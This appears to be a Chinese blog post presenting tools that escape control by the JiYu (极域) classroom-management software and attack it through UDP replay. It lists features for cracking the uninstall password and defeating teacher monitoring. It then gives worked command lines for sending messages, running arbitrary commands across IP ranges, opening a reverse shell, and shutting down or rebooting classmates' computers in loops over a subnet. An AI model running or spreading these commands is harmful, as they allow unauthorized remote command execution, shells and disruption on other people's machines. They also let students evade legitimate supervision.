喵?

极域脱离控制及UDP重放攻击

发表于 分类于 Valine:
本文字数: 2.1k 阅读时长 ≈ 2 分钟
脱离极域控制

1. JiYuTrainer

1.1. 功能

  • 在不影响极域正常运行的情况下将 全屏的广播 转为 窗口广播 模式,您不仅可自己操作,也可看老师讲解课程。
  • 内置强杀、启停极域 StudentMain.exe 进程功能,无需依赖其他软件。
  • 内置破解极域解锁卸载密码功能,支持新版极域。
  • 反监视功能,经测试,开启反监视,教师端就无法监视您所用的电脑。
  • 防控制功能,防止教师通过极域控制您所用的电脑。
  • 监控极域远程执行命令,您可以自由选择是否允许教师端远程执行的命令。
  • 通过极域电子教室对同学的电脑远程发送信息或远程执行命令。

1.2. 下载

2. Jiyu_udp_attack

2.1. 下载

2.2. 使用方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
usage:
    ------------------- Github Repositories -------------------
            https://github.com/ht0Ruial/Jiyu_udp_attack
       [-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T]
       [-e {r,s,g,nc,break,continue}]
       {r,s,g,nc,break,continue} ...
positional arguments:
  {r,s,g,nc,break,continue}
                        -e 参数的详细说明
    r                   reboot 重启
    s                   shutdown 关机
    g                   独立选项,获取当前的ip地址以及学生端监听的端口
    nc                  独立选项,反弹shell的机器需出网,退出可使用命令exit
    break               独立选项,脱离屏幕控制,需要管理员权限
    continue            独立选项,恢复屏幕控制
optional arguments:
  -h, --help            show this help message and exit
  -ip IP                ip 指定目标IP地址
  -p P                  port 指定监听端口,默认端口为4705
  -msg MSG              send_message发送消息 eg: -msg "HelloWord!"
  -c C                  command命令 eg: -c "cmd.exe /c ipconfig"
  -l L                  循环次数,默认为1
  -t T                  循环时间间隔,默认是22秒
  -e {r,s,g,nc,break,continue}
                        Extra Options加载额外的选项 eg:-e r

2.3. 使用例子

2.3.1. Tips:

使用 -ip 参数指定目标IP时,可以有以下几种指定方式:

  • 指定单个IP,如 192.168.80.12
  • 指定IP范围,如 192.168.80.10-56
  • 指定IP所在C段,如 192.168.80.1/24

2.3.2. 获取内网ip地址及监听的端口

若学生端监听端口不是默认的4705,则在后续操作过程中需使用 -p 参数指定端口

1
python Jiyu_udp_attack.py -e g

2.3.3. 脱离屏幕控制

当前运行权限需为管理员权限,主要用于开启MpsSvc服务

1
python Jiyu_udp_attack.py -e break

2.3.4. 恢复屏幕控制

1
python Jiyu_udp_attack.py -e continue

2.3.5. 发送消息

若学生端监听端口为4705,向IP地址为192.168.80.12的机器发送一条内容为”hello,baby!”的消息

1
python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"

若学生端监听端口为4605,需使用 -p 参数指定端口,向IP地址为192.168.80.12的机器发送一条内容为”hello,baby!”的消息

1
python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"

2.3.6. 执行命令

给192.168.80.12到192.168.80.137弹一个计算器

1
python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe

2.3.7. 反弹shell

反弹shell时,IP只能为某个机器IP,不能批量反弹,而且机器需要出网

因为已经实现批量的任意命令执行,考虑到批量反弹也没啥意义,遂不添加

1
python Jiyu_udp_attack.py -ip 192.168.80.12 -e nc

2.3.8. 关机重启

关机

1
python Jiyu_udp_attack.py -ip 192.168.80.12 -e s

重启

1
python Jiyu_udp_attack.py -ip 192.168.80.12 -e r

2.3.9. 循环

利用循环持续发送消息

1-254的机器会收到一条”hello,baby!”的消息,50s后会继续执行,共执行3次

1
python Jiyu_udp_attack.py -ip 192.168.80.23/24 -msg "hello,baby!" -l 3 -t 50

欢迎关注我的其它发布渠道